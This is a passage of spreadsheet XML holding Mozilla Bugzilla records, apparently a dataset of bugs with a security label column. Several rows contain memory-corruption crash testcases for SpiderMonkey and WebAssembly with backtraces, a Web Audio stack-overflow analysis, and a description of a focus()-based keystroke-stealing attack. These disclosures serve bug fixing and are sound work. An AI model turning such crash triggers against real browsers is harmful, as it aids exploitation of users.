      </c>
      <c r="J4213" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4213" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4213" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4213" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4213" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4213" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4213" t="inlineStr">
        <is>
          <t>[js:p1:fx16][sg:critical][jsbugmon:verify-branch=mozilla-aurora;mozilla-beta;mozilla-release,ignore][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q4213" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4213" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4213" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T4213" t="n">
        <v>1</v>
      </c>
      <c r="U4213" t="n">
        <v>0</v>
      </c>
      <c r="V4213" t="n">
        <v>15</v>
      </c>
      <c r="W4213" t="inlineStr">
        <is>
          <t>The following test asserts/crashes on mozilla-central revision c758cc9b60e5 (options -m -n):
try {
function fun() {
    (new fun (("10"))) ('function pf' + (((true) )[ fun ]) + '() {}');
}
fun();
} catch(exc1) {}
function eval() { eval(  ) ; }
function DoWhile_3()
  eval();
try {
  DoWhile_3(  ) ;
} catch(e) { }
function f()
  test();
function test() {
  try {
    for (var i in f());
  } catch ( foopy  ) {  }  
  gc();
}
test();
Backtrace in Opt build:
==7571== Invalid read of size 8
==7571==    at 0x5781C1: void js::gc::MarkInternal&lt;JSString&gt;(JSTracer*, JSString**) (Heap.h:969)
==7571==    by 0x5799BD: js::gc::MarkValueInternal(JSTracer*, JS::Value*) (Marking.cpp:329)
==7571==    by 0x579BBE: js::gc::MarkValueRootRange(JSTracer*, unsigned long, JS::Value*, char const*) (Marking.cpp:369)
==7571==    by 0x5384B1: js::StackSpace::mark(JSTracer*) (Stack.cpp:527)
==7571==    by 0x4567DD: _ZN2jsL11MarkRuntimeEP8JSTracerb.clone.246 (jsgc.cpp:2325)
==7571==    by 0x456D37: BeginMarkPhase(JSRuntime*) (jsgc.cpp:2975)
==7571==    by 0x45A210: GCCycle(JSRuntime*, bool, long, js::JSGCInvocationKind) (jsgc.cpp:3271)
==7571==    by 0x45B38F: Collect(JSRuntime*, bool, long, js::JSGCInvocationKind, js::gcreason::Reason) (jsgc.cpp:3719)
==7571==    by 0x56C80C: GC(JSContext*, unsigned int, JS::Value*) (TestingFunctions.cpp:52)
==7571==    by 0x47E337: js::InvokeKernel(JSContext*, js::CallArgs, js::MaybeConstruct) (jscntxtinlines.h:426)
==7571==    by 0x47A234: js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) (jsinterp.cpp:2744)
==7571==    by 0x5F9DDD: UncachedInlineCall(js::VMFrame&amp;, js::InitialFrameFlags, void**, bool*, unsigned int) (InvokeHelpers.cpp:376)
==7571==  Address 0xe3000 is not stack'd, malloc'd or (recently) free'd
Assuming s-s and sec-critical due to GC related crash. Furthermore, this crash affects mozilla-aurora and mozilla-beta as well.</t>
        </is>
      </c>
      <c r="X4213" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4214">
      <c r="A4214" t="n">
        <v>307168</v>
      </c>
      <c r="B4214" t="inlineStr">
        <is>
          <t>2005-09-05 21:51:29 -0700</t>
        </is>
      </c>
      <c r="C4214" t="inlineStr">
        <is>
          <t>Need to clone NSPR X86-64 GCC configure fix to main configure (hidden visibility)</t>
        </is>
      </c>
      <c r="D4214" t="inlineStr">
        <is>
          <t>2018-03-02 12:12:20 -0800</t>
        </is>
      </c>
      <c r="E4214" t="n">
        <v>1</v>
      </c>
      <c r="F4214" t="n">
        <v>1</v>
      </c>
      <c r="G4214" t="n">
        <v>7</v>
      </c>
      <c r="H4214" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4214" t="inlineStr">
        <is>
          <t>Firefox Build System</t>
        </is>
      </c>
      <c r="J4214" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4214" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4214" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4214" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4214" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4214" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4214" t="inlineStr">
        <is>
          <t>[FIX]</t>
        </is>
      </c>
      <c r="Q4214" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4214" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4214" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4214" t="n">
        <v>1</v>
      </c>
      <c r="U4214" t="n">
        <v>4</v>
      </c>
      <c r="V4214" t="n">
        <v>73</v>
      </c>
      <c r="W4214" t="inlineStr">
        <is>
          <t>Trunk fails to build on X86-64 (using FC3 with gcc version 3.4.2 20041017 (Red
Hat 3.4.2-6.fc3) with a relocation failure for R_X86_64_PC32.  The error comes
in zlib.
The fix from bug 293438 for nspr configure(.in) needs to be cloned to the trunk
configure (and configure.in).
Patch to be added</t>
        </is>
      </c>
      <c r="X4214" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4215">
      <c r="A4215" t="n">
        <v>555448</v>
      </c>
      <c r="B4215" t="inlineStr">
        <is>
          <t>2010-03-27 07:48:16 -0700</t>
        </is>
      </c>
      <c r="C4215" t="inlineStr">
        <is>
          <t>[autoconfig] Wrong error msg: Says "Username or password invalid", although it could be any kind of error (verifyConfig)</t>
        </is>
      </c>
      <c r="D4215" t="inlineStr">
        <is>
          <t>2021-07-13 06:47:14 -0700</t>
        </is>
      </c>
      <c r="E4215" t="n">
        <v>1</v>
      </c>
      <c r="F4215" t="n">
        <v>1</v>
      </c>
      <c r="G4215" t="n">
        <v>2</v>
      </c>
      <c r="H4215" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4215" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="J4215" t="inlineStr">
        <is>
          <t>Account Manager</t>
        </is>
      </c>
      <c r="K4215" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4215" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4215" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4215" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4215" t="inlineStr">
        <is>
          <t>[GS]</t>
        </is>
      </c>
      <c r="Q4215" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4215" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4215" t="inlineStr">
        <is>
          <t>Thunderbird 68.0</t>
        </is>
      </c>
      <c r="T4215" t="n">
        <v>1</v>
      </c>
      <c r="U4215" t="n">
        <v>4</v>
      </c>
      <c r="V4215" t="n">
        <v>32</v>
      </c>
      <c r="W4215" t="inlineStr">
        <is>
          <t>Reproduction:
1. File | New | Mail account...
2. Enter foo@gmx.com and continue
3. Disconnect network, or any other error
4. Click on "Create account"
Actual result:
Dialog says "username and/or password invalid"
Expected result:
The actual error is is shown, whatever was the cause for the failed verification.
There are thousands of reasons why the check may have failed: network down, server down, server malfunctioning, our network code malfunctioning, the dialog code having some exception (just add "throw 'foo';" somewhere in verifyConfig.js).
"username and/or password invalid" MUST NOT be shown unless we are certain that it was the username or password, or at least that the server refused the authentication. If the server gave an error message (even as response to authentication), that message must be shown. Sometimes, authentication fails simply because only one POP check within 15 minutes is allowed, and the server then says that as error message in response to the login.
Importance:
Misleading error messages which tell the *wrong* cause are worse than none. They make users try to fix the wrong thing (here: try other username permutations or hunt for the right password, maybe it was changed?) and therefore cause severe problems.</t>
        </is>
      </c>
      <c r="X4215" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4216">
      <c r="A4216" t="n">
        <v>1871838</v>
      </c>
      <c r="B4216" t="inlineStr">
        <is>
          <t>2023-12-24 19:34:42 -0800</t>
        </is>
      </c>
      <c r="C4216" t="inlineStr">
        <is>
          <t>stack-buffer-overflow webaudio/AudioEventTimeline.cpp:510  in AudioEventTimeline::GetValuesAtTimeHelperInternal</t>
        </is>
      </c>
      <c r="D4216" t="inlineStr">
        <is>
          <t>2024-05-30 11:17:55 -0700</t>
        </is>
      </c>
      <c r="E4216" t="n">
        <v>1</v>
      </c>
      <c r="F4216" t="n">
        <v>1</v>
      </c>
      <c r="G4216" t="n">
        <v>3</v>
      </c>
      <c r="H4216" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4216" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4216" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K4216" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4216" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4216" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4216" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4216" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main122+]</t>
        </is>
      </c>
      <c r="Q4216" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4216" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4216" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T4216" t="n">
        <v>1</v>
      </c>
      <c r="U4216" t="n">
        <v>0</v>
      </c>
      <c r="V4216" t="n">
        <v>20</v>
      </c>
      <c r="W4216" t="inlineStr">
        <is>
          <t>Created attachment 9370190
poc.html
#Reproduce
OS:Win10 X64
123.0a1 (2023-12-19) (64-bit)
#Step:
1. python -m http.server 1337
2. python -m ffpuppet firefox.exe -p prefs.js -d -u http://localhost:1337/poc.html
#Analysis
missing boundary checks for `ticks + start, detune + start, end - start`
https://searchfox.org/mozilla-central/source/dom/media/webaudio/OscillatorNode.cpp#300
```
  void ProcessBlock(AudioNodeTrack* aTrack, GraphTime aFrom,
                    const AudioBlock&amp; aInput, AudioBlock* aOutput,
                    bool* aFinished) override {
    MOZ_ASSERT(mSource == aTrack, "Invalid source track");
    TRACE("OscillatorNodeEngine::ProcessBlock");
    TrackTime ticks = mDestination-&gt;GraphTimeToTrackTime(aFrom);
    if (mStart == -1) {
      ComputeSilence(aOutput);
      return;
    }
    if (ticks + WEBAUDIO_BLOCK_SIZE &lt;= mStart || ticks &gt;= mStop) {
      ComputeSilence(aOutput);
    } else {
      aOutput-&gt;AllocateChannels(1);
      float* output = aOutput-&gt;ChannelFloatsForWrite(0);
      uint32_t start, end;
      FillBounds(output, ticks, start, end);
      float frequency[WEBAUDIO_BLOCK_SIZE];
      float detune[WEBAUDIO_BLOCK_SIZE];
      if (ParametersMayNeedUpdate()) {
        if (mFrequency.HasSimpleValue()) {
          std::fill_n(frequency, WEBAUDIO_BLOCK_SIZE, mFrequency.GetValue());
        } else {
          mFrequency.GetValuesAtTime(ticks + start, frequency + start,
                                     end - start);
        }
        if (mDetune.HasSimpleValue()) {
          std::fill_n(detune, WEBAUDIO_BLOCK_SIZE, mDetune.GetValue());
        } else {
          mDetune.GetValuesAtTime(ticks + start, detune + start, end - start);
        }
      }
```</t>
        </is>
      </c>
      <c r="X4216" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4217">
      <c r="A4217" t="n">
        <v>653149</v>
      </c>
      <c r="B4217" t="inlineStr">
        <is>
          <t>2011-04-27 09:22:04 -0700</t>
        </is>
      </c>
      <c r="C4217" t="inlineStr">
        <is>
          <t>The visual difference between internal and public bug is way too subtle</t>
        </is>
      </c>
      <c r="D4217" t="inlineStr">
        <is>
          <t>2011-04-28 00:52:40 -0700</t>
        </is>
      </c>
      <c r="E4217" t="n">
        <v>1</v>
      </c>
      <c r="F4217" t="n">
        <v>1</v>
      </c>
      <c r="G4217" t="n">
        <v>7</v>
      </c>
      <c r="H4217" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4217" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4217" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K4217" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4217" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4217" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4217" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4217" t="inlineStr"/>
      <c r="Q4217" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4217" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4217" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4217" t="n">
        <v>1</v>
      </c>
      <c r="U4217" t="n">
        <v>0</v>
      </c>
      <c r="V4217" t="n">
        <v>6</v>
      </c>
      <c r="W4217" t="inlineStr">
        <is>
          <t>Since the update it's now really not obvious if a bug is internal or not - the slightest light blue border behind a mostly grey page vs, not having that light blue background is indiscernible.</t>
        </is>
      </c>
      <c r="X4217" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4218">
      <c r="A4218" t="n">
        <v>552255</v>
      </c>
      <c r="B4218" t="inlineStr">
        <is>
          <t>2010-03-14 00:47:47 -0800</t>
        </is>
      </c>
      <c r="C4218" t="inlineStr">
        <is>
          <t>focus() behavior may be used to inject, maybe steal keystrokes</t>
        </is>
      </c>
      <c r="D4218" t="inlineStr">
        <is>
          <t>2020-11-21 13:57:57 -0800</t>
        </is>
      </c>
      <c r="E4218" t="n">
        <v>1</v>
      </c>
      <c r="F4218" t="n">
        <v>1</v>
      </c>
      <c r="G4218" t="n">
        <v>3</v>
      </c>
      <c r="H4218" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4218" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4218" t="inlineStr">
        <is>
          <t>DOM: UI Events &amp; Focus Handling</t>
        </is>
      </c>
      <c r="K4218" t="inlineStr">
        <is>
          <t>1.9.2 Branch</t>
        </is>
      </c>
      <c r="L4218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4218" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4218" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4218" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4218" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q4218" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4218" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4218" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4218" t="n">
        <v>1</v>
      </c>
      <c r="U4218" t="n">
        <v>0</v>
      </c>
      <c r="V4218" t="n">
        <v>47</v>
      </c>
      <c r="W4218" t="inlineStr">
        <is>
          <t>Hi folks,
I originally thought this only applies to WebKit, but realized it can be tweaked to work with Firefox only after making this proof-of-concept public. Sorry for that - it's fairly low risk, but probably interesting:
http://lcamtuf.coredump.cx/focus-webkit/
This PoC is probably Windows-specific. Unlike clickjacking, this permits a fairly high degree of sophistication in interacting with third-party sites.
An obvious way to mitigate the risk is to mimic the behavior of MSIE / Opera - that is:
1) Forbid or defer focus changes between onkeydown and onkeyup, so that a malicious page can't see what's being pressed, but deliver the result elsewhere,
2) When focus is grabbed by another document in an IFRAME, and then returned, we should probably not attempt to restore it to the last known editing location, but reset it instead.
Now, the more interesting part. NOTE: THIS PART OF THE BUG IS NOT PUBLIC. We also noticed that the following is possible in WebKit browsers, and to a more limited extent and with some tweaks, in MSIE:
http://lcamtuf.coredump.cx/focus-webkit/toplevel.html
In essence, the same attack can be reversed, and allow cross-domain IFRAME gadgets to steal keystrokes (including password field entries) transparently.
This attack does not work on Firefox as-is, but this seems to be due to a conjunction of what I presume are two bugs; and not a conscious security decision:
1) Calling top.focus() always seem to be silently ignored, even if the current browser window is, in fact, in focus, and the call is being made from a currently in-focus IFRAME on that page. In other browsers, this simply returns focus to the top-level document. In Firefox, it does not, presumably because of an overzealous anti-annoyance filter meant to prevent pop-ups from doing setInterval('focus()',1).
2) The other way to approach this would be to call &lt;iframedwindow&gt;.blur(), but counterintuitively, this blurs the entire browser window (and amusingly, doing setInterval('blur()',1) from within an IFRAME makes the browser unusable). This looks like something that may eventually get fixed by accident.
I suspect there might be some other way to restore focus to the top-level doc, but I have no obvious ideas. Even if not, it is a more compelling argument to implement the aforementioned changes to focus behavior.</t>
        </is>
      </c>
      <c r="X4218" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4219">
      <c r="A4219" t="n">
        <v>1871605</v>
      </c>
      <c r="B4219" t="inlineStr">
        <is>
          <t>2023-12-22 11:12:49 -0800</t>
        </is>
      </c>
      <c r="C4219" t="inlineStr">
        <is>
          <t>Crash [@ JSObject::getClass] with WebAssembly and Debugger</t>
        </is>
      </c>
      <c r="D4219" t="inlineStr">
        <is>
          <t>2024-05-14 21:13:48 -0700</t>
        </is>
      </c>
      <c r="E4219" t="n">
        <v>1</v>
      </c>
      <c r="F4219" t="n">
        <v>1</v>
      </c>
      <c r="G4219" t="n">
        <v>3</v>
      </c>
      <c r="H4219" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4219" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4219" t="inlineStr">
        <is>
          <t>JavaScript: WebAssembly</t>
        </is>
      </c>
      <c r="K4219" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4219" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4219" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4219" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4219" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4219" t="inlineStr">
        <is>
          <t>[bugmon:update,bisect][adv-main122+r]</t>
        </is>
      </c>
      <c r="Q4219" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4219" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S4219" t="inlineStr">
        <is>
          <t>123 Branch</t>
        </is>
      </c>
      <c r="T4219" t="n">
        <v>1</v>
      </c>
      <c r="U4219" t="n">
        <v>0</v>
      </c>
      <c r="V4219" t="n">
        <v>15</v>
      </c>
      <c r="W4219" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 20231222-e22abf3976f2 (debug build, run with --fuzzing-safe --ion-offthread-compile=off --more-compartments):
    evaluate(`
    function wasmEvalText(str, imports) {
        binary = wasmTextToBinary(str)
        try {
            m = new WebAssembly.Module(binary)} catch {}
        return new WebAssembly.Instance(m, imports)}
    g23 = newGlobal()
    g23.parent = this
    g23.eval(\`
          Debugger(parent).onEnterFrame = function() {}
    \`)
    base = wasmEvalText(\`(module
        (global (export "rngState")
          (mut i32) (i32.const 1)
        )
        (type $tArrayI32      (array (mut i32)))  (type $tArrayArrayI32 (array (mut (ref null $tArrayI32)))) (func (result (ref $tArrayI32))
            (i32.const 0)
            (array.new $tArrayI32
              (i32.const 0)
          )
        )
        (func (export "createPrimaryArrayLoop")
            (param i32) (param $arrarr (ref $tArrayArrayI32)) 
            (result (ref $tArrayArrayI32))
            (local.get $arrarr)
        )
    )\`)
    t33 =
    \`(module
        (type $tArrayI32      (array (mut i32)))  (type $tArrayArrayI32 (array (mut (ref null $tArrayI32)))) (import "" "rngState" (global $rngState (mut i32)))
        (import "" "createPrimaryArrayLoop" 
          (func $createPrimaryArrayLoop
            (param i32(ref $tArrayArrayI32)) 
            (result (ref $tArrayArrayI32))))
        (func $createPrimaryArray 
                                (result (ref $tArrayArrayI32))
          (return_call $createPrimaryArrayLoop
            (i32.const 0)
            (array.new $tArrayArrayI32 (ref.null $tArrayI32) (i32.const 1500)))
        )
       (func (export "churn")  (result i32)
         (local $finalSum i32)
         (local $arrarr (ref $tArrayArrayI32))
         (local.set $arrarr (call $createPrimaryArray))
         (i32.xor (local.get $finalSum) (global.get $rngState))
       )
    )\`;
    i30 = wasmEvalText(t33, {"": base.exports});
    fns = i30.exports;
    (fns.churn())`)
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x0000555556eaf184 in JSObject::getClass() const ()
    #1  0x00005555582d18ac in js::wasm::AnyRef::toJSValue() const ()
    #2  0x000055555850f856 in bool ToJSValue_anyref&lt;js::wasm::NoDebug&gt;(JSContext*, void*, JS::MutableHandle&lt;JS::Value&gt;) ()
    #3  0x000055555850caf1 in bool js::wasm::ToJSValue&lt;js::wasm::NoDebug&gt;(JSContext*, void const*, js::wasm::PackedType&lt;js::wasm::FieldTypeTraits&gt;, JS::MutableHandle&lt;JS::Value&gt;, js::wasm::CoercionLevel) ()
    #4  0x0000555558415708 in js::wasm::ResultsToJSValue(JSContext*, js::wasm::ResultType, void*, mozilla::Maybe&lt;char*&gt;, JS::MutableHandle&lt;JS::Value&gt;, js::wasm::CoercionLevel) ()
    #5  0x00005555583dbce0 in js::wasm::DebugFrame::updateReturnJSValue(JSContext*) ()
    #6  0x00005555583b551d in WasmHandleDebugTrap() ()
    #7  0x00001182f491283b in ?? ()
    #8  0x00007fffffffbc60 in ?? ()
    #9  0x0e5f1dd2a9ce8f04 in ?? ()
    #10 0x0000000000000000 in ?? ()
    rax	0xffffd555559925c0	-46912491674176
    rbx	0xffffd555559925c0	-46912491674176
    rcx	0x0	0
    rdx	0x7fffffffbdf8	140737488338424
    rsi	0xffffd555559925c0	-46912491674176
    rdi	0xffffd555559925c0	-46912491674176
    rbp	0x7fffffffba20	140737488337440
    rsp	0x7fffffffba20	140737488337440
    r8	0x0	0
    r9	0xf98ffe1	261685217
    r10	0x5555558d7ce6	93824995917030
    r11	0x4d4	1236
    r12	0x7fffffffbaa8	140737488337576
    r13	0xc8	200
    r14	0x7ffff3d34900	140737284098304
    r15	0x7fffffffbde8	140737488338408
    rip	0x555556eaf184 &lt;JSObject::getClass() const+4&gt;
    =&gt; 0x555556eaf184 &lt;_ZNK8JSObject8getClassEv+4&gt;:	mov    (%rdi),%rax
       0x555556eaf187 &lt;_ZNK8JSObject8getClassEv+7&gt;:	test   $0x7,%al
Marking s-s due to type of crash, but this involves the Debugger, so likely not more than sec-moderate at most.</t>
        </is>
      </c>
      <c r="X4219" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4220">
      <c r="A4220" t="n">
        <v>832893</v>
      </c>
      <c r="B4220" t="inlineStr">
        <is>
          <t>2013-01-21 01:20:03 -0800</t>
        </is>
      </c>
      <c r="C4220" t="inlineStr">
        <is>
          <t>change jobqueue.pl to spawn worker processes to deliver bugmail to avoid memory leaks</t>
        </is>
      </c>
      <c r="D4220" t="inlineStr">
        <is>
          <t>2017-02-03 05:15:39 -0800</t>
        </is>
      </c>
      <c r="E4220" t="n">
        <v>1</v>
      </c>
      <c r="F4220" t="n">
        <v>1</v>
      </c>
      <c r="G4220" t="n">
        <v>4</v>
      </c>
      <c r="H4220" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4220" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J4220" t="inlineStr">
        <is>
          <t>Email Notifications</t>
        </is>
      </c>
      <c r="K4220" t="inlineStr">
        <is>
          <t>4.0.9</t>
        </is>
      </c>
      <c r="L4220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4220" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4220" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4220" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4220" t="inlineStr"/>
      <c r="Q4220" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4220" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4220" t="inlineStr">
        <is>
          <t>Bugzilla 4.4</t>
        </is>
      </c>
      <c r="T4220" t="n">
        <v>1</v>
      </c>
      <c r="U4220" t="n">
        <v>0</v>
      </c>
      <c r="V4220" t="n">
        <v>23</v>
      </c>
      <c r="W4220" t="inlineStr">
        <is>
          <t>recently we've seen several occurrences of jobqueue.pl consuming large amounts of memory, pushing the webheads into swap.
for example, most recently had jobqueues consuming 1.4g each.
given the push frequency, we're not sure if this is a new issue, or it's a recent change.</t>
        </is>
      </c>
      <c r="X4220" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4221">
      <c r="A4221" t="n">
        <v>1398796</v>
      </c>
      <c r="B4221" t="inlineStr">
        <is>
          <t>2017-09-11 06:58:33 -0700</t>
        </is>
      </c>
      <c r="C4221" t="inlineStr">
        <is>
          <t>Do uptake monitoring in TC</t>
        </is>
      </c>
      <c r="D4221" t="inlineStr">
        <is>
          <t>2018-03-08 09:32:27 -0800</t>
        </is>
      </c>
      <c r="E4221" t="n">
        <v>1</v>
      </c>
      <c r="F4221" t="n">
        <v>1</v>
      </c>
      <c r="G4221" t="n">
        <v>5</v>
      </c>
      <c r="H4221" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4221" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4221" t="inlineStr">
        <is>
          <t>Release Automation: Other</t>
        </is>
      </c>
      <c r="K4221" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4221" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4221" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4221" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4221" t="inlineStr"/>
      <c r="Q4221" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4221" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4221" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4221" t="n">
        <v>1</v>
      </c>
      <c r="U4221" t="n">
        <v>0</v>
      </c>
      <c r="V4221" t="n">
        <v>51</v>
      </c>
      <c r="W4221" t="inlineStr">
        <is>
          <t>Alternatively, we could kill uptake monitoring. I'm not sure what it buys us right now.</t>
        </is>
      </c>
      <c r="X4221" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4222">
      <c r="A4222" t="n">
        <v>765218</v>
      </c>
      <c r="B4222" t="inlineStr">
        <is>
          <t>2012-06-15 06:25:28 -0700</t>
        </is>
      </c>
      <c r="C4222" t="inlineStr">
        <is>
          <t>Out of bounds read in ElementAnimations::EnsureStyleRuleFor</t>
        </is>
      </c>
      <c r="D4222" t="inlineStr">
        <is>
          <t>2012-07-20 18:19:00 -0700</t>
        </is>
      </c>
      <c r="E4222" t="n">
        <v>1</v>
      </c>
      <c r="F4222" t="n">
        <v>1</v>
      </c>
      <c r="G4222" t="n">
        <v>3</v>
      </c>
      <c r="H4222" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4222" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4222" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K4222" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4222" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4222" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4222" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4222" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa-]</t>
        </is>
      </c>
      <c r="Q4222" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4222" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4222" t="inlineStr">
        <is>
          <t>mozilla16</t>
        </is>
      </c>
      <c r="T4222" t="n">
        <v>1</v>
      </c>
      <c r="U4222" t="n">
        <v>0</v>
      </c>
      <c r="V4222" t="n">
        <v>15</v>
      </c>
